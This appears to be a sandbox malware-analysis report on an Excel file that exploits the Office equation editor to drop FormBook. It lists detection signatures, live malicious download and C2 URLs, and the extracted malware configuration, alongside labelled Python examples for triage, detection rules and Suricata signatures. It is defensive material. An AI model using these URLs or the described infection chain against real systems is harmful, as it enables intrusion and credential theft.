Windows Analysis Report 7009.xlsx

Overview

General Information

Sample Name: 7009.xlsx
Analysis ID: 532894
MD5: 8305dc6702f80d7ebe34cd8c63297561
SHA1: db055cce075213d510de5ca9044ea76036dbcd07
SHA256: 9eae576f7ecc05f106a7cfa605b1ca5bcd02c8d1c2c926920c0d7f0cb605b345
Tags: Formbook VelvetSweatshop xlsx
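
The VelvetSweatshop tag refers to Excel's built-in default workbook password: a workbook encrypted with that password opens without any prompt, while the encryption still defeats static scanners that expect a plain OOXML zip. The triage routine below, an added example and not part of the Joe Sandbox report, tells a plain zip-based .xlsx apart from an OLE compound file carrying an EncryptedPackage/EncryptionInfo pair (the Office 2007+ encryption layout) or a legacy Workbook stream, which is the cue to retry the file with the default password. Both sample inputs are constructed in the code; the CFB case is a byte scan for directory-entry names rather than a full compound-file parse, which is adequate for triage but not for anything that needs the stream contents.

```python
# Added example (not Joe Sandbox code): is this .xlsx a plain OOXML zip, or an OLE
# compound file hiding an encrypted package (the "VelvetSweatshop" trick)?
import io
import zipfile

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"  # OLE2 / compound file header
ZIP_MAGIC = b"PK\x03\x04"                        # local file header of a zip
DEFAULT_EXCEL_PASSWORD = "VelvetSweatshop"       # Excel tries this silently on open


def _has_stream(data: bytes, name: str) -> bool:
    # CFB directory entries store stream names as UTF-16LE. Scanning the raw
    # bytes is enough for triage; a real parser would walk the directory chain.
    return name.encode("utf-16-le") in data


def triage(data: bytes) -> dict:
    """Classify the container and say whether the default password is worth a try."""
    result = {
        "container": "unknown",
        "encrypted_ooxml": False,
        "legacy_workbook": False,
        "try_default_password": False,
    }
    if data.startswith(ZIP_MAGIC):
        result["container"] = "zip"
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
            result["has_workbook_part"] = "xl/workbook.xml" in names
        except zipfile.BadZipFile:
            result["container"] = "corrupt-zip"
    elif data.startswith(CFB_MAGIC):
        result["container"] = "cfb"
        # Office 2007+ encryption: the real zip lives inside EncryptedPackage,
        # the key-derivation parameters inside EncryptionInfo.
        result["encrypted_ooxml"] = (
            _has_stream(data, "EncryptedPackage") and _has_stream(data, "EncryptionInfo")
        )
        # A BIFF8 .xls renamed to .xlsx; its FilePass record may also use the default.
        result["legacy_workbook"] = _has_stream(data, "Workbook")
        result["try_default_password"] = (
            result["encrypted_ooxml"] or result["legacy_workbook"]
        )
    return result


def _make_plain_xlsx() -> bytes:
    # Constructed sample: the minimum zip layout a plain workbook has.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
    return buf.getvalue()


def _make_fake_encrypted_cfb() -> bytes:
    # Constructed sample: CFB magic, zero-padded 512-byte header, then the
    # UTF-16LE names an encrypted-package directory would contain.
    header = CFB_MAGIC + b"\x00" * (512 - len(CFB_MAGIC))
    names = ("Root Entry", "EncryptionInfo", "EncryptedPackage")
    entries = b"".join(n.encode("utf-16-le") + b"\x00\x00" for n in names)
    return header + entries


if __name__ == "__main__":
    for label, blob in (("plain", _make_plain_xlsx()),
                        ("encrypted", _make_fake_encrypted_cfb())):
        print(label, triage(blob))
```

When the routine reports try_default_password, the msoffcrypto-tool project's documented invocation (msoffcrypto-tool encrypted.xlsx decrypted.xlsx -p VelvetSweatshop) recovers the inner zip, which can then be fed to the usual OOXML and Equation Editor object checks.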

Detection

DBatLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected DBatLoader
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
May check if the current machine is a sandbox (GetTickCount - Sleep)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Yara signature match
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality to record screenshots
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Office Equation Editor has been started
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to detect sandboxes (mouse cursor move detection)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
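
Four of the signatures above (EQNEDT32.EXE connecting to the internet, File Dropped By EQNEDT32EXE, the equation editor starting processes, and Execution from Suspicious Folder) describe the same short chain seen in the process tree: EQNEDT32.EXE fetches a payload, writes it to C:\Users\Public, and executes it. The detection logic below is an added example, not Joe Sandbox or Sigma code; it replays those rules over constructed Sysmon-style events (IDs 1, 3 and 11) whose paths and download host are taken from the report. One caveat worth encoding: EQNEDT32.EXE is started as an out-of-process COM server, so its parent is svchost.exe, not EXCEL.EXE, and a rule that keys on the Office binary as parent will miss it.

```python
# Added example (not Joe Sandbox or Sigma code): the EQNEDT32-centric rules from
# the report, applied to constructed Sysmon-style events.
import ipaddress
from typing import Dict, List, Tuple

EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed events modelled on Sysmon Event IDs 1 (ProcessCreate),
# 3 (NetworkConnect) and 11 (FileCreate). EQNEDT32.EXE is launched by DCOM,
# hence the svchost.exe parent; the rules therefore key on EQNEDT32 itself.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": EQNEDT,
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": "3", "Image": EQNEDT,
     "DestinationIp": "13.250.31.113", "DestinationPort": "80"},
    {"EventID": "11", "Image": EQNEDT,
     "TargetFilename": r"C:\Users\Public\vbc.exe"},
    {"EventID": "1", "Image": r"C:\Users\Public\vbc.exe", "ParentImage": EQNEDT},
    # Benign controls that must not fire.
    {"EventID": "3", "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": "445"},
    {"EventID": "1", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Folders a process should not normally execute from. Lower-case with a trailing
# separator so "c:\users\public\" does not match "c:\users\publicity\...".
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "c:\\windows\\temp\\", "\\appdata\\local\\temp\\")


def _is_eqnedt(image: str) -> bool:
    return image.lower().endswith("\\eqnedt32.exe")


def _is_public_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def evaluate(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, artefact) pairs for every event that matches a rule."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        eid, image = ev.get("EventID"), ev.get("Image", "")
        # "EQNEDT32.EXE connecting to internet": the equation editor has no
        # reason to reach a public address at all.
        if eid == "3" and _is_eqnedt(image) and _is_public_ip(ev["DestinationIp"]):
            hits.append(("eqnedt32_network", ev["DestinationIp"]))
        # "File Dropped By EQNEDT32EXE"
        if eid == "11" and _is_eqnedt(image):
            hits.append(("eqnedt32_file_drop", ev["TargetFilename"]))
        # "Office equation editor starts processes"
        if eid == "1" and _is_eqnedt(ev.get("ParentImage", "")):
            hits.append(("eqnedt32_child_process", image))
        # "Execution from Suspicious Folder"
        if eid == "1" and any(d in image.lower() for d in SUSPICIOUS_DIRS):
            hits.append(("suspicious_folder_exec", image))
    return hits


if __name__ == "__main__":
    for rule, artefact in evaluate(SAMPLE_EVENTS):
        print(f"{rule:24s} {artefact}")
```

The four hits on the constructed events come from three of the six records; the two benign controls (an internal SMB connection from svchost.exe and notepad.exe under explorer.exe) do not fire. In production the same logic is expressed as Sigma rules with process_creation, network_connection and file_event logsources, and the public-address test is what keeps the network rule quiet on hosts where EQNEDT32.EXE legitimately touches a local print server.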

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://www.urzeczenie.com/hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== Avira URL Cloud: Label: malware
Source: http://13.250.31.113/7009/binso.exe Avira URL Cloud: Label: malware
Source: www.heidecide.xyz/hno0/ Avira URL Cloud: Label: phishing
Found malware configuration
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.heidecide.xyz/hno0/"], "decoy": ["526854.rest", "loosesalatoyof2.xyz", "drillshear.com", "kdsh-uae.com", "firstnetinsurance.net", "28684dw.com", "hikinglifekr.com", "astramed-clinic.store", "24hxinh.com", "livebongdatv.net", "henrymaskph.com", "newlanlan.com", "txboilerparts.com", "thepurldistrict.com", "changemylifefast.info", "sapphirecloset.com", "ascensionmemberszoom.com", "huffmanworks.com", "techarcstudio.com", "terbulen.store", "naamgem.com", "pwrsearch.com", "al-solaiman.com", "eastrwanda.com", "ruihongco.com", "grandrecordto-gathertoday.info", "bleuexpress.com", "estate.xyz", "intlglobaldelivery.com", "zeneplaza.com", "citiesmalawi.properties", "pumpkincheshire.com", "sunflowerhub.com", "zhongzhenghuagong.com", "aquaticatt.com", "kspqs.com", "cpshapes.com", "fgiheating.com", "primasariutama.com", "hotel-arcosdelparque.com", "benjaminagencymarketing.com", "whiteleyop.xyz", "ahmty.net", "transaction-immo.com", "bungaauraprediction.com", "profumeriamedici.com", "olymporian.com", "uprgoad.com", "negotat.com", "xn--z4qv1cr56dk0k.group", "bestwlz.com", "strongu-miner.com", "presticgroup.com", "cutos2.com", "mintstationery.com", "annengfanglei.com", "carijualpt.com", "chinagxsy.com", "urzeczenie.com", "dianyingyouquanquan.xyz", "voucheraja.com", "sdtcbh.com", "hyslier.com", "siebenmorgenband.com"]}
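
The extracted configuration separates one real C2 path (www.heidecide.xyz/hno0/) from 64 decoy domains. FormBook sends the same /hno0/ request to decoys and to the C2 alike, which is why the URL flagged by Avira above goes to www.urzeczenie.com, a decoy, and not to the C2. Decoy domains are frequently legitimate sites, so they belong on a watchlist rather than a blocklist. The helper below is an added example, not Joe Sandbox code: it loads an excerpt of the report's configuration (only four of the decoys are embedded), classifies observed URLs as C2, decoy or unknown, and emits a Suricata rule for the real C2; the rule text, the sid and the excerpt are assumptions made for the example.

```python
# Added example (not Joe Sandbox code): turn the extracted FormBook config into
# indicators and keep decoy traffic distinct from the real C2.
import json
from typing import Dict, Set, Tuple
from urllib.parse import urlsplit

# Excerpt of the configuration the extractor recovered (decoy list truncated
# here; the report carries 64 decoy domains).
CONFIG_JSON = """{"C2 list": ["www.heidecide.xyz/hno0/"],
 "decoy": ["526854.rest", "drillshear.com", "urzeczenie.com", "siebenmorgenband.com"]}"""


def load_config(text: str) -> Tuple[Dict[str, str], Set[str]]:
    """Return ({c2_host: uri_path}, {decoy domains}) from the extractor's JSON."""
    cfg = json.loads(text)
    c2: Dict[str, str] = {}
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        c2[host.lower()] = "/" + path
    decoys = {d.lower() for d in cfg["decoy"]}
    return c2, decoys


def _strip_www(host: str) -> str:
    # FormBook prefixes decoy domains with "www." when it contacts them.
    return host[4:] if host.startswith("www.") else host


def classify_url(url: str, c2: Dict[str, str], decoys: Set[str]) -> str:
    """'c2' for the real C2 path, 'decoy' for a configured decoy, else 'unknown'."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    if host in c2 and parts.path.startswith(c2[host]):
        return "c2"
    if _strip_www(host) in decoys:
        return "decoy"
    return "unknown"


def suricata_rule(host: str, path: str, sid: int) -> str:
    """Block rule for the real C2 only; decoys stay on a watchlist (assumed rule text)."""
    return (
        'alert http $HOME_NET any -> $EXTERNAL_NET any '
        '(msg:"FormBook C2 %s%s"; flow:established,to_server; '
        'http.host; content:"%s"; http.uri; content:"%s"; startswith; '
        'classtype:trojan-activity; sid:%d; rev:1;)' % (host, path, host, path, sid)
    )


if __name__ == "__main__":
    c2, decoys = load_config(CONFIG_JSON)
    observed = "http://www.urzeczenie.com/hno0/?mhcd=MR-LdRqXxT7p86"
    print(observed, "->", classify_url(observed, c2, decoys))
    for host, path in c2.items():
        print(suricata_rule(host, path, 1000001))
```

The URI path is shared by every host the bot contacts, so a second, host-agnostic rule on the /hno0/ path alone catches the decoy beacons too; it carries more false-positive risk than the host-bound rule and is better run as an alert than a drop.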
Multi AV Scanner detection for submitted file
Source: 7009.xlsx Virustotal: Detection: 35%
Source: 7009.xlsx ReversingLabs: Detection: 40%
Yara detected FormBook
Source: Yara match File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe ReversingLabs: Detection: 35%
Source: C:\Users\user\Odhbljup.exe ReversingLabs: Detection: 35%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 35%
Machine Learning detection for dropped file
Source: C:\Users\user\Odhbljup.exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.3.vbc.exe.315eec.144.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e610.131.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfdb70.107.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7909c.165.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50f4.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.33154c.246.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310e80.52.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3152c8.112.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d710a4.42.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cebffc.148.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d1ac.249.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79768.59.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310c38.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.162.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf3014.139.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331ca4.264.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d598.276.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f0.273.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d70008.71.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf058c.74.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6459c.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cdcd68.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced598.275.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64370.24.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cefb84.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71894.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81dfc.272.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64d5c.90.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31914c.181.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe2fc.126.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81b18.61.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31cf84.239.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3292e0.46.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81f44.282.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec8e4.217.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e368.15.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe610.133.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0b08.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.30cd68.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e610.133.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331c54.260.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec008.207.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d792e0.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f4.268.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331ef4.277.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.319308.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318b08.37.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318d98.156.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d010fc.238.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e2fc.126.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d60e80.53.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32d0a8.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d685dc.151.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31943c.205.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec8e4.215.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cece70.235.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315494.130.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced594.281.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31932c.197.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d4f0.271.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32e0c8.115.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68b08.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0b08.35.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321414.55.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3143b0.68.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71894.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf9f90.13.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329c94.206.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7f438.209.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329f90.12.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced4f4.268.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d69308.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf4008.145.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e2fc.123.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331dfc.272.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d74008.145.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.314008.64.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d594.279.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01f44.282.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c008.209.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321b2c.121.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315e30.138.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8d98.157.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced4f0.273.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f4.267.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.324008.147.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81b78.257.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d598.275.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.324008.79.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01ef4.276.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6932c.191.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7126c.100.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce943c.204.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d792e0.46.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf93d4.174.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced4f4.267.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31459c.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31943c.203.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01dfc.274.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d60eec.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4b88.80.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68e6c.167.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d8058c.216.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfd0a8.92.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315e2c.142.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c3b0.212.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9258.185.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71b2c.122.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c8e0.221.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50cc.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0154c.245.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80008.214.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce943c.203.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cd5c.233.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32b840.150.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.332764.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4b88.82.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced448.260.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64d5c.88.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3210a4.44.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d65eec.146.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331f44.281.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cf84.239.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329a74.199.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0154c.246.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec3b0.213.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.314b88.80.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81dfc.274.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310c38.38.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80ed4.234.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf9768.59.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec3b0.211.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce43b0.68.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80008.213.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1b2c.121.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9f80.26.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4b84.85.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.324008.145.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4f28.98.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cb84.227.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d594.279.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3143b0.70.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.330ed4.233.unpack Avira: Label: TR/Patched.Ren.Gen
